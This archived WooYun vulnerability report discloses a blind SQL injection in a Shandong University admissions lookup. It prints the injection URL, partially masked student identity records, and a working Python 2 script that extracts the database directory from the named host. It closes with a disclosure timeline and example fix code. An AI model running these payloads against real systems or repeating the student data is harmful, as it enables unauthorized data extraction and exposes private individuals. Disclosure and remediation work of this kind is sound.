WooYun (WooYun.org) historical vulnerability archive---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-10-22: Details sent to the vendor, awaiting the vendor's response
2015-10-22: Vendor confirmed; details disclosed to the vendor only
2015-11-01: Details disclosed to core white hats and experts in the relevant field
2015-11-10: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public
A Shandong University endpoint leaks personal information and is also vulnerable to boolean-based blind GET SQL injection (script attached)
Visiting http://www.bkzs.sdu.edu.cn/queryadmit?examno=%27xor%28if%28now%28%29=sysdate%28%29%20and%20ascii%28mid%28@@datadir,1,1%29%29%3E1,sleep%281%29,1%29%29or%27b&idcard=e&name=c&year=2015&tn=monline_4_dg returns a student's identity record when the injected condition is true:
{"id":"43440","ssmc":"13河北","kslxmc":"器乐校考","ksh":"15130401***008","sfzh":"130404****01282419","xm":"张*昕","xb":"男","zymc":"音乐学(西洋器乐表演)","bz":"","year":"2015","tag":"1"}
When the condition is false, a different record is returned:
{"id":"43439","ssmc":"13河北","kslxmc":"器乐校考","ksh":"15130104***062","sfzh":"130104****12232429","xm":"费*汇","xb":"女","zymc":"音乐学(中国民族器乐表演)","bz":"","year":"2015","tag":"1"}
2. Injection verification script:
#coding=utf-8
# Python 2 script. Extracts @@datadir one character at a time by binary search
# over the ASCII range, using the two distinct records (id 43440 vs 43439)
# as the true/false oracle.
import sys
import urllib2
from urllib2 import Request, urlopen, URLError, HTTPError

result = ''

def request(URL, data):
    # Send one probe and return the response body.
    user_agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, data, user_agent)
    try:
        resp = urllib2.urlopen(req)
    except HTTPError, e:
        if e.code == 500:
            return 'Runtime Error'
        # Any other HTTP error carries no record to compare against.
        return ''
    except URLError, e:
        #print('[!] We failed to reach a server.')
        #print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return resp.read()

def binary_sqli(left, right, index):
    # Narrow [left, right] until the ASCII value of character `index` is fixed;
    # the oracle answers "ascii(...) > mid".
    global result
    while 1:
        mid = (left + right) / 2
        if right - left == 1:
            result += chr(right)
            print 'datadir: ', result
            break
        payload = "a%%27xor(if(now()=sysdate()%%20and%%20ascii(mid(@@datadir,%s,1))>%s,sleep(1),1))or%%27b&idcard=e&name=c&year=2015&tn=monline_4_dg" % (index, mid)
        print payload
        html = request('http://www.bkzs.sdu.edu.cn/queryadmit?examno=' + payload, None)
        verify = '43440'   # id of the record returned when the condition is true
        if verify in html:
            left = mid
        else:
            right = mid

if __name__ == '__main__':
    for i in range(1, 21):
        binary_sqli(32, 127, i)
datadir obtained through the injection:
Parameter filtering
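As an added illustration of what parameter filtering should look like for this endpoint (example code, not from the report or the site): whitelist validation of each field, plus a parameterized query so that whatever reaches the database is bound as data. It uses an in-memory SQLite table with constructed rows in place of the real MySQL backend; the field widths in the patterns are assumptions.

```python
import re
import sqlite3

# Constructed sample rows in the shape of the leaked JSON (id, ksh, sfzh, xm, year).
SAMPLE_ROWS = [
    ("43439", "15130104000062", "130104000012232429", "李四", "2015"),
    ("43440", "15130401000008", "130404000001282419", "张三", "2015"),
]

# Whitelist per parameter (widths are assumptions, not taken from the report):
# 14-digit exam number, 18-character ID card, 2-20 Chinese characters, 4-digit year.
RULES = {
    "examno": re.compile(r"^\d{14}$"),
    "idcard": re.compile(r"^\d{17}[\dXx]$"),
    "name": re.compile(r"^[\u4e00-\u9fa5]{2,20}$"),
    "year": re.compile(r"^\d{4}$"),
}

def validate(params):
    """First layer: every field present and matching its whitelist pattern."""
    return all(k in params and RULES[k].match(params[k]) for k in RULES)

def connect():
    """In-memory stand-in for the admissions table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admit (id TEXT, ksh TEXT, sfzh TEXT, xm TEXT, year TEXT)")
    conn.executemany("INSERT INTO admit VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn

def safe_lookup(conn, params):
    """Second layer: values are bound through placeholders, never spliced into
    SQL, and all four fields must match so a caller cannot widen the WHERE clause."""
    row = conn.execute(
        "SELECT id, ksh, xm FROM admit WHERE ksh=? AND sfzh=? AND xm=? AND year=?",
        (params["examno"], params["idcard"], params["name"], params["year"]),
    ).fetchone()
    return {"id": row[0], "ksh": row[1], "xm": row[2]} if row else {}

def query_admit(params, conn=None):
    """Request handler: reject malformed input outright, then run the bound query."""
    if not validate(params):
        return None
    return safe_lookup(conn or connect(), params)
```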
Severity: High
Vulnerability Rank: 14
Confirmed: 2015-10-22 20:12
Reported to the unit that owns the system for handling
2015-11-10: Fixed